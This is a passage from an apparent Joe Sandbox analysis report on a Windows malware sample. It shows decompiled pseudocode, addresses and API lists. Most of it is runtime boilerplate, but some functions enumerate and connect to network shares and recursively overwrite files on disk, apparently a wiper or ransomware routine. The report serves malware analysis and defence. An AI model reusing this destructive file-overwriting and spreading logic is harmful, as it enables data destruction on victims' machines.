				intOrPtr* _t40;
				intOrPtr* _t41;

				_t40 = __imp__DecodePointer;
				_t11 =  *_t40( *0x14a8a8, _t33, _t39, _t23, _t27); // executed
				_t24 = _t11;
				_v8 = _t24;
				_t12 =  *_t40( *0x14a8a4); // executed
				_t41 = _t12;
				if(_t41 < _t24) {
					L11:
					_t13 = 0;
				} else {
					_t36 = _t41 - _t24;
					_t2 = _t36 + 4; // 0x4
					if(_t2 < 4) {
						goto L11;
					} else {
						_t26 = E00144E1A(_t24);
						_t3 = _t36 + 4; // 0x4
						if(_t26 >= _t3) {
							L10:
							_t37 = __imp__EncodePointer; // executed
							_t17 =  *_t37(_a4); // executed
							 *_t41 = _t17;
							_t18 =  *_t37(_t41 + 4); // executed
							 *0x14a8a4 = _t18;
							_t13 = _a4;
						} else {
							_t19 = 0x800;
							if(_t26 < 0x800) {
								_t19 = _t26;
							}
							_t20 = _t19 + _t26;
							if(_t19 + _t26 < _t26) {
								L7:
								_t5 = _t26 + 0x10; // 0x10
								_t21 = _t5;
								if(_t5 < _t26) {
									goto L11;
								} else {
									_t22 = E001444F9(_v8, _t21);
									if(_t22 == 0) {
										goto L11;
									} else {
										goto L9;
									}
								}
							} else {
								_t22 = E001444F9(_v8, _t20);
								if(_t22 != 0) {
									L9:
									_t41 = _t22 + (_t36 >> 2) * 4;
									__imp__EncodePointer(_t22);
									 *0x14a8a8 = _t22;
									goto L10;
								} else {
									goto L7;
								}
							}
						}
					}
				}
				return _t13;
			}





















    0x0014355a
    0x00143567
    0x0014356f
    0x00143571
    0x00143574
    0x00143576
    0x0014357a
    0x00143601
    0x00143601
    0x00143580
    0x00143582
    0x00143584
    0x0014358a
    0x00000000
    0x0014358c
    0x00143592
    0x00143594
    0x0014359a
    0x001435e4
    0x001435e7
    0x001435ed
    0x001435ef
    0x001435f5
    0x001435f7
    0x001435fc
    0x0014359c
    0x0014359c
    0x001435a3
    0x001435a5
    0x001435a5
    0x001435a7
    0x001435ab
    0x001435bc
    0x001435bc
    0x001435bc
    0x001435c1
    0x00000000
    0x001435c3
    0x001435c7
    0x001435d0
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001435d0
    0x001435ad
    0x001435b1
    0x001435ba
    0x001435d2
    0x001435d6
    0x001435d9
    0x001435df
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001435ba
    0x001435ab
    0x0014359a
    0x0014358a
    0x00143607

    APIs
    • DecodePointer.KERNEL32(?,?,?,?,?,00143656,?,00147C90,0000000C,00143682,?,?,00141BE8,001427C4), ref: 00143567
    • DecodePointer.KERNEL32(?,?,?,?,?,00143656,?,00147C90,0000000C,00143682,?,?,00141BE8,001427C4), ref: 00143574
      • Part of subcall function 00144E1A: HeapSize.KERNEL32(00000000,00000000,?,00143592,00000000,?,?,?,?,?,00143656,?,00147C90,0000000C,00143682,?), ref: 00144E45
      • Part of subcall function 001444F9: Sleep.KERNEL32(00000000,00000000,00000000,?,001435CC,00000000,00000010,?,?,?,?,?,00143656,?,00147C90,0000000C), ref: 00144523
    • EncodePointer.KERNEL32(00000000,?,?,?,?,?,00143656,?,00147C90,0000000C,00143682,?,?,00141BE8,001427C4), ref: 001435D9
    • EncodePointer.KERNEL32(?,?,?,?,?,?,00143656,?,00147C90,0000000C,00143682,?,?,00141BE8,001427C4), ref: 001435ED
    • EncodePointer.KERNEL32(-00000004,?,?,?,?,?,00143656,?,00147C90,0000000C,00143682,?,?,00141BE8,001427C4), ref: 001435F5
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 001416BF, Relevance: 6.0, APIs: 4, Instructions: 18thread

    Control-flow Graph

    C-Code - Quality: 100%
    			E001416BF(void* __eflags) {
				void* _t7;

				SetThreadPriority(GetCurrentThread(), 2);
				SetThreadPriority(GetCurrentThread(), 0xf);
				E001415CB(_t7, 0); // executed
				return 0;
			}




    0x001416d2
    0x001416d9
    0x001416dd
    0x001416e6

    APIs
    • GetCurrentThread.KERNEL32(00000002), ref: 001416C9
    • SetThreadPriority.KERNEL32(00000000), ref: 001416D2
    • GetCurrentThread.KERNEL32(0000000F), ref: 001416D6
    • SetThreadPriority.KERNEL32(00000000), ref: 001416D9
      • Part of subcall function 001415CB: WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 001415F2
      • Part of subcall function 001415CB: GlobalAlloc.KERNELBASE(00000040,?,?,?,?,?,?,?,?,?,001416E2,00000000), ref: 00141606
      • Part of subcall function 001415CB: WNetEnumResourceW.MPR(?,?,00000000,?), ref: 0014162F
      • Part of subcall function 001415CB: WNetAddConnection2W.MPR(-00000028,00000000,00000000,00000004), ref: 00141652
      • Part of subcall function 001415CB: WNetCancelConnection2W.MPR(-00000014,00000000,00000001), ref: 00141669
      • Part of subcall function 001415CB: GlobalFree.KERNEL32(00000000), ref: 001416A3
      • Part of subcall function 001415CB: WNetCloseEnum.MPR(?), ref: 001416AD
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 00141B9B, Relevance: 1.6, APIs: 1, Instructions: 54

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 223 141b9b-141ba7 224 141ba9-141bb6 call 143740 223->224 225 141bc2-141bda call 14368c call 141b77 223->225 224->225 230 141bb8-141bc1 224->230 234 141bdc-141be3 call 143675 225->234 235 141c30-141c31 225->235 230->225 237 141be8-141bf7 234->237 238 141c08-141c11 237->238 239 141bf9-141bfd 237->239 242 141c2e 238->242 243 141c13-141c20 call 143740 238->243 240 141bff 239->240 241 141c01-141c06 239->241 240->241 241->238 241->239 242->235 243->242 246 141c22-141c26 243->246 246->242
    C-Code - Quality: 23%
    			E00141B9B(void* __edi, void* __esi, intOrPtr _a4) {
				void* _t4;
				intOrPtr* _t10;
				void* _t18;
				intOrPtr* _t19;
				void* _t21;

				_t21 = __esi;
				_t18 = __edi;
				_t24 =  *0x14a8b0;
				if( *0x14a8b0 != 0 && E00143740(_t24, 0x14a8b0) != 0) {
					_t2 =  *0x14a8b0(_a4);
				}
				E0014368C(_t2);
				_t4 = E00141B77(0x146190, 0x1461a4); // executed
				_t26 = _t4;
				if(_t4 == 0) {
					_push(_t21);
					_push(_t18);
					E00143675(_t26, E001427C4); // executed
					_t19 = 0x146188;
					if(0x146188 >= 0x14618c) {
						L8:
						_t30 =  *0x14a8b4;
						if( *0x14a8b4 != 0 && E00143740(_t30, 0x14a8b4) != 0) {
							 *0x14a8b4(0, 2, 0);
						}
						return 0;
					} else {
						goto L5;
					}
					do {
						L5:
						_t10 =  *_t19;
						if(_t10 != 0) {
							 *_t10();
						}
						_t19 = _t19 + 4;
					} while (_t19 < 0x14618c);
					goto L8;
				}
				return _t4;
			}








    0x00141b9b
    0x00141b9b
    0x00141ba0
    0x00141ba7
    0x00141bbb
    0x00141bc1
    0x00141bc2
    0x00141bd1
    0x00141bd8
    0x00141bda
    0x00141bdc
    0x00141bdd
    0x00141be3
    0x00141bf3
    0x00141bf7
    0x00141c08
    0x00141c08
    0x00141c11
    0x00141c28
    0x00141c28
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00141bf9
    0x00141bf9
    0x00141bf9
    0x00141bfd
    0x00141bff
    0x00141bff
    0x00141c01
    0x00141c04
    0x00000000
    0x00141bf9
    0x00141c31

    APIs
      • Part of subcall function 0014368C: EncodePointer.KERNEL32(2657F566,?,?,00141BC7), ref: 00143698
    • __initterm_e.LIBCMT ref: 00141BD1
      • Part of subcall function 00143740: __FindPESection.LIBCMT ref: 0014379B
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 0014523E, Relevance: 1.6, APIs: 1, Instructions: 52

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 247 14523e-145248 248 145265-14526e 247->248 249 14524a-145254 247->249 250 145271-145276 248->250 251 145270 248->251 249->248 252 145256-145264 call 14353f 249->252 253 14528b-145292 250->253 254 145278-145289 RtlAllocateHeap 250->254 251->250 256 145294-14529d call 1434d5 253->256 257 1452b0-1452b5 253->257 254->253 259 1452bd-1452bf 254->259 256->250 263 14529f-1452a4 256->263 257->259 261 1452b7 257->261 261->259 264 1452ac-1452ae 263->264 265 1452a6 263->265 264->259 265->264
    C-Code - Quality: 86%
    			E0014523E(signed int _a4, signed int _a8, long _a12) {
				void* _t10;
				long _t11;
				long _t12;
				signed int _t13;
				signed int _t17;
				long _t19;
				long _t24;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					_t24 = _t17 * _a8;
					__eflags = _t24;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
						__eflags = _t24;
					}
					goto L5;
					L6:
					_t10 = RtlAllocateHeap( *0x14a5c8, 8, _t24); // executed
					__eflags = 0;
					if(0 == 0) {
						goto L7;
					}
					L14:
					return _t10;
					goto L15;
					L7:
					__eflags =  *0x14a780;
					if( *0x14a780 == 0) {
						_t19 = _a12;
						__eflags = _t19;
						if(_t19 != 0) {
							 *_t19 = 0xc;
						}
					} else {
						_t11 = E001434D5(_t10, _t24);
						__eflags = _t11;
						if(_t11 != 0) {
							L5:
							_t10 = 0;
							__eflags = _t24 - 0xffffffe0;
							if(_t24 > 0xffffffe0) {
								goto L7;
							} else {
								goto L6;
							}
						} else {
							_t12 = _a12;
							__eflags = _t12;
							if(_t12 != 0) {
								 *_t12 = 0xc;
							}
							_t10 = 0;
						}
					}
					goto L14;
				} else {
					_t13 = 0xffffffe0;
					_t27 = _t13 / _t17 - _a8;
					if(_t13 / _t17 >= _a8) {
						goto L3;
					} else {
						 *((intOrPtr*)(E0014353F(_t27))) = 0xc;
						return 0;
					}
				}
				L15:
			}










    0x00145243
    0x00145248
    0x00145265
    0x0014526a
    0x0014526c
    0x0014526e
    0x00145270
    0x00145270
    0x00145270
    0x00000000
    0x00145278
    0x00145281
    0x00145287
    0x00145289
    0x00000000
    0x00000000
    0x001452bd
    0x001452bf
    0x00000000
    0x0014528b
    0x0014528b
    0x00145292
    0x001452b0
    0x001452b3
    0x001452b5
    0x001452b7
    0x001452b7
    0x00145294
    0x00145295
    0x0014529b
    0x0014529d
    0x00145271
    0x00145271
    0x00145273
    0x00145276
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0014529f
    0x0014529f
    0x001452a2
    0x001452a4
    0x001452a6
    0x001452a6
    0x001452ac
    0x001452ac
    0x0014529d
    0x00000000
    0x0014524a
    0x0014524e
    0x00145251
    0x00145254
    0x00000000
    0x00145256
    0x0014525b
    0x00145264
    0x00145264
    0x00145254
    0x00000000

    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,001444C3,?,?,00000000,00000000,00000000,?,0014294C,00000001,00000214,?,00141E3B), ref: 00145281
      • Part of subcall function 001434D5: DecodePointer.KERNEL32(?,0014529A,?,00000000,?,001444C3,?,?,00000000,00000000,00000000,?,0014294C,00000001,00000214), ref: 001434E0
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 00143608, Relevance: 1.5, APIs: 1, Instructions: 22

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 266 143608-14362b call 1444ad EncodePointer 269 14362d-143631 266->269 270 143632-143638 266->270
    C-Code - Quality: 37%
    			E00143608() {
				signed int* _t1;
				void* _t3;
				signed int* _t6;

				_t1 = E001444AD(0x20, 4);
				_t6 = _t1;
				__imp__EncodePointer(_t6); // executed
				 *0x14a8a8 = _t1;
				 *0x14a8a4 = _t1;
				if(_t6 != 0) {
					 *_t6 =  *_t6 & 0x00000000;
					return 0;
				} else {
					_t3 = 0x18;
					return _t3;
				}
			}






    0x0014360f
    0x00143616
    0x00143619
    0x0014361f
    0x00143624
    0x0014362b
    0x00143632
    0x00143638
    0x0014362d
    0x0014362f
    0x00143631
    0x00143631

    APIs
      • Part of subcall function 001444AD: Sleep.KERNEL32(00000000), ref: 001444D5
    • EncodePointer.KERNEL32(00000000), ref: 00143619
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 0014368C, Relevance: 1.5, APIs: 1, Instructions: 13

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 271 14368c-143690 272 143692-1436aa EncodePointer 271->272 272->272 273 1436ac-1436ae 272->273
    APIs
    • EncodePointer.KERNEL32(2657F566,?,?,00141BC7), ref: 00143698
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 00142C5E, Relevance: 1.5, APIs: 1, Instructions: 10

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 274 142c5e-142c7b HeapCreate
    C-Code - Quality: 100%
    			E00142C5E() {
				void* _t3;

				_t3 = HeapCreate(0, 0x1000, 0); // executed
				 *0x14a5c8 = _t3;
				return 0 | _t3 != 0x00000000;
			}




    0x00142c67
    0x00142c74
    0x00142c7b

    APIs
    • HeapCreate.KERNELBASE(00000000,00001000,00000000,0014189B), ref: 00142C67
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 00142F4B, Relevance: 1.5, APIs: 1, Instructions: 4

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 275 142f4b-142f5b EncodePointer
    APIs
    • EncodePointer.KERNEL32(Function_00002F12,00141B72,00000000,00000000,00000000,00000000,00000000,00000000,771CF9A3,00142BAE,?,001418AC), ref: 00142F50
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 001427EA, Relevance: 1.5, APIs: 1, Instructions: 3
    APIs
    • EncodePointer.KERNEL32(00000000,00141CA9,?,00141DD9,000000FF,?,001430FD,00000011,?,?,001428B7,0000000D,?,00141E3B,00000003), ref: 001427EC
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 001444AD, Relevance: 1.3, APIs: 1, Instructions: 30sleep
    C-Code - Quality: 100%
    			E001444AD(signed int _a4, signed int _a8) {
				void* _t4;
				long _t6;
				void* _t7;
				long _t8;
				void* _t9;
				void* _t12;
				void* _t13;

				_t8 = 0;
				while(1) {
					_t4 = E0014523E(_a4, _a8, 0); // executed
					_t7 = _t4;
					_t9 = _t9 + 0xc;
					if(_t7 != 0) {
						break;
					}
					_t12 =  *0x14a774 - _t4; // 0x0
					if(_t12 > 0) {
						Sleep(_t8);
						_t3 = _t8 + 0x3e8; // 0x3e8
						_t6 = _t3;
						_t13 = _t6 -  *0x14a774; // 0x0
						if(_t13 > 0) {
							_t6 = _t6 | 0xffffffff;
						}
						_t8 = _t6;
						if(_t6 != 0xffffffff) {
							continue;
						}
					}
					break;
				}
				return _t7;
			}










    0x001444b4
    0x001444b6
    0x001444be
    0x001444c3
    0x001444c5
    0x001444ca
    0x00000000
    0x00000000
    0x001444cc
    0x001444d2
    0x001444d5
    0x001444db
    0x001444db
    0x001444e1
    0x001444e7
    0x001444e9
    0x001444e9
    0x001444ec
    0x001444f1
    0x00000000
    0x00000000
    0x001444f1
    0x00000000
    0x001444d2
    0x001444f8

    APIs
      • Part of subcall function 0014523E: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,001444C3,?,?,00000000,00000000,00000000,?,0014294C,00000001,00000214,?,00141E3B), ref: 00145281
    • Sleep.KERNEL32(00000000), ref: 001444D5
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd

    Non-executed Functions

    Function 00141441, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 109
    C-Code - Quality: 61%
    			E00141441(void* __edx, WCHAR* _a4) {
				signed int _v12;
				short _v1056;
				struct _WIN32_FIND_DATAW _v1648;
				WCHAR* _v1652;
				void* _v1656;
				WCHAR* _v1660;
				void* _v1668;
				char _v1672;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t30;
				WCHAR* _t32;
				int _t37;
				WCHAR* _t40;
				void* _t59;
				void* _t65;
				void* _t66;
				void* _t68;
				signed int _t69;

				_t65 = __edx;
				_t30 =  *0x149004; // 0x20251455
				_v12 = _t30 ^ _t69;
				_t32 = _a4;
				_v1660 = _t32;
				wsprintfW( &_v1056, L"%s\\*", _t32);
				_t37 = FindFirstFileW( &_v1056,  &_v1648);
				_v1656 = _t37;
				if(_t37 != 0xffffffff) {
					_t68 = GetProcessHeap;
					_t59 = PathAppendW;
					do {
						_t40 = HeapAlloc(GetProcessHeap(), 8, 0x410);
						_v1652 = _t40;
						PathAppendW(_t40, _v1660);
						PathAppendW(_v1652,  &(_v1648.cFileName));
						if((_v1648.dwFileAttributes & 0x00000010) == 0) {
							_v1672 = 0;
							asm("stosd");
							_t66 = CreateFileW(_v1652, 0x40000000, 0, 0, 3, 0x80, 0);
							if(_t66 != 0xffffffff) {
								__imp__GetFileSizeEx(_t66,  &_v1672);
								CloseHandle(_t66);
								if(_v1672 <= 0xf4240) {
									E0014117C(_v1652, _t65);
								} else {
									E001410F5(_t59, _t65, _v1652);
									goto L9;
								}
							}
						} else {
							_t66 = __imp__#156;
							_push(".");
							_push( &(_v1648.cFileName));
							if( *_t66() != 0) {
								_push(L"..");
								_push( &(_v1648.cFileName));
								if( *_t66() != 0) {
									E00141441(_t65, _v1652);
									L9:
								}
							}
						}
						HeapFree(GetProcessHeap(), 8, _v1652);
					} while (FindNextFileW(_v1656,  &_v1648) != 0);
					_t37 = FindClose(_v1656);
				}
				return E001417EA(_t37, _t59, _v12 ^ _t69, _t65, _t66, _t68);
			}























    0x00141441
    0x0014144a
    0x00141451
    0x00141454
    0x0014145b
    0x0014146d
    0x00141484
    0x0014148a
    0x00141493
    0x00141499
    0x0014149f
    0x001414a5
    0x001414af
    0x001414bb
    0x001414c2
    0x001414d1
    0x001414da
    0x00141530
    0x0014153c
    0x00141543
    0x00141548
    0x00141552
    0x00141559
    0x00141569
    0x0014157f
    0x0014156b
    0x00141571
    0x00000000
    0x00141571
    0x00141569
    0x001414dc
    0x001414dc
    0x001414e2
    0x001414ed
    0x001414f2
    0x001414f8
    0x00141503
    0x00141508
    0x00141510
    0x00141576
    0x00141576
    0x00141508
    0x001414f2
    0x0014158f
    0x001415a8
    0x001415b6
    0x001415b6
    0x001415ca

    APIs
    • wsprintfW.USER32 ref: 0014146D
    • FindFirstFileW.KERNEL32(?,?), ref: 00141484
    • GetProcessHeap.KERNEL32(00000008,00000410), ref: 001414AC
    • HeapAlloc.KERNEL32(00000000), ref: 001414AF
    • PathAppendW.SHLWAPI(00000000,?), ref: 001414C2
    • PathAppendW.SHLWAPI(?,?), ref: 001414D1
    • StrCmpCW.SHLWAPI(?,00147918), ref: 001414EE
    • StrCmpCW.SHLWAPI(?,0014791C), ref: 00141504
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,00000080,00000000), ref: 0014153D
    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00141552
    • CloseHandle.KERNEL32(00000000), ref: 00141559
      • Part of subcall function 0014117C: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,00000080,00000000), ref: 001411E0
      • Part of subcall function 0014117C: GetLastError.KERNEL32(?,40000000,00000000,00000000,00000003,00000080,00000000,76F881EF,?,00141584), ref: 001411ED
      • Part of subcall function 0014117C: SetFilePointer.KERNEL32(00000000,000000FF,00000000,00000002,?,40000000,00000000,00000000,00000003,00000080,00000000,76F881EF,?,00141584), ref: 00141204
      • Part of subcall function 0014117C: WriteFile.KERNEL32(00000000,?,00000001,?,00000000), ref: 00141218
      • Part of subcall function 0014117C: FlushFileBuffers.KERNEL32(00000000), ref: 00141223
      • Part of subcall function 0014117C: GetFileSizeEx.KERNEL32(00000000,?,?,40000000,00000000,00000000,00000003,00000080,00000000,76F881EF,?,00141584), ref: 00141231
      • Part of subcall function 0014117C: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,40000000,00000000,00000000,00000003,00000080,00000000,76F881EF,?,00141584), ref: 0014123B
      • Part of subcall function 0014117C: WriteFile.KERNEL32(00000000,?,00001000,?,00000000), ref: 0014128B
      • Part of subcall function 0014117C: FlushFileBuffers.KERNEL32(00000000), ref: 001412CA
      • Part of subcall function 0014117C: CloseHandle.KERNEL32(00000000), ref: 001412D1
      • Part of subcall function 001410F5: CreateFileW.KERNEL32(00141576,40000000,00000000,00000000,00000003,00000080,00000000), ref: 00141129
      • Part of subcall function 001410F5: SetFilePointer.KERNEL32(00000000,000000FF,00000000,00000000,?,00141576,?), ref: 0014113B
      • Part of subcall function 001410F5: WriteFile.KERNEL32(00000000,?,00001000,?,00000000), ref: 00141156
      • Part of subcall function 001410F5: FlushFileBuffers.KERNEL32(00000000), ref: 00141161
      • Part of subcall function 001410F5: CloseHandle.KERNEL32(00000000), ref: 00141168
    • GetProcessHeap.KERNEL32(00000008,?), ref: 0014158C
    • HeapFree.KERNEL32(00000000), ref: 0014158F
    • FindNextFileW.KERNEL32(?,00000010), ref: 001415A2
    • FindClose.KERNEL32(?), ref: 001415B6
      • Part of subcall function 001417EA: IsDebuggerPresent.KERNEL32 ref: 00141A54
      • Part of subcall function 001417EA: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00141A69
      • Part of subcall function 001417EA: UnhandledExceptionFilter.KERNEL32(001461B8), ref: 00141A74
      • Part of subcall function 001417EA: GetCurrentProcess.KERNEL32(C0000409), ref: 00141A90
      • Part of subcall function 001417EA: TerminateProcess.KERNEL32(00000000), ref: 00141A97
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 0014388B, Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 134library
    APIs
      • Part of subcall function 001427EA: EncodePointer.KERNEL32(00000000,00141CA9,?,00141DD9,000000FF,?,001430FD,00000011,?,?,001428B7,0000000D,?,00141E3B,00000003), ref: 001427EC
    • LoadLibraryW.KERNEL32(USER32.DLL), ref: 001438C6
    • GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 001438E2
    • EncodePointer.KERNEL32(00000000), ref: 001438F3
    • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00143900
    • EncodePointer.KERNEL32(00000000), ref: 00143903
    • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00143910
    • EncodePointer.KERNEL32(00000000), ref: 00143913
    • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 00143920
    • EncodePointer.KERNEL32(00000000), ref: 00143923
    • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 00143934
    • EncodePointer.KERNEL32(00000000), ref: 00143937
    • DecodePointer.KERNEL32(00000000,00149E88,00000314,00000000), ref: 00143959
    • DecodePointer.KERNEL32 ref: 00143963
    • DecodePointer.KERNEL32(?,00149E88,00000314,00000000), ref: 001439A2
    • DecodePointer.KERNEL32(?), ref: 001439BC
    • DecodePointer.KERNEL32(00149E88,00000314,00000000), ref: 001439D0
      • Part of subcall function 001417EA: IsDebuggerPresent.KERNEL32 ref: 00141A54
      • Part of subcall function 001417EA: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00141A69
      • Part of subcall function 001417EA: UnhandledExceptionFilter.KERNEL32(001461B8), ref: 00141A74
      • Part of subcall function 001417EA: GetCurrentProcess.KERNEL32(C0000409), ref: 00141A90
      • Part of subcall function 001417EA: TerminateProcess.KERNEL32(00000000), ref: 00141A97
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    Function 00141E00, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 148file
    C-Code - Quality: 78%
    			E00141E00(void* __edx, void* _a4) {
				signed int _v8;
				struct HINSTANCE__* _v9;
				void _v508;
				long _v512;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t18;
				signed int _t23;
				short _t28;
				void* _t32;
				void* _t34;
				void* _t37;
				long _t38;
				void* _t39;
				struct HINSTANCE__* _t40;
				void* _t52;
				long _t53;
				void* _t54;
				signed int _t55;
				void* _t56;
				void* _t57;

				_t52 = __edx;
				_t18 =  *0x149004; // 0x20251455
				_v8 = _t18 ^ _t55;
				_t54 = _a4;
				_t53 = E00141DDA(_t54);
				_t40 = 0;
				_v512 = _t53;
				if(_t53 != 0) {
					if(E00143BB7(3) == 1 || E00143BB7(3) == 0 &&  *0x149000 == 1) {
						_t54 = GetStdHandle(0xfffffff4);
						if(_t54 != _t40 && _t54 != 0xffffffff) {
							_t23 = 0;
							while(1) {
								 *((char*)(_t55 + _t23 - 0x1f8)) =  *((intOrPtr*)(_t53 + _t23 * 2));
								if( *((intOrPtr*)(_t53 + _t23 * 2)) == _t40) {
									break;
								}
								_t23 = _t23 + 1;
								if(_t23 < 0x1f4) {
									continue;
								}
								break;
							}
							_v9 = _t40;
							_t20 = WriteFile(_t54,  &_v508, E00143800( &_v508),  &_v512, _t40);
						}
					} else {
						if(_t54 != 0xfc) {
							_t53 = 0x149e88;
							_t28 = E00143B54(0x149e88, 0x314, L"Runtime Error!\n\nProgram: ");
							_t57 = _t56 + 0xc;
							if(_t28 != 0) {
								_push(_t40);
								_push(_t40);
								_push(_t40);
								_push(_t40);
								_push(_t40);
								goto L9;
							} else {
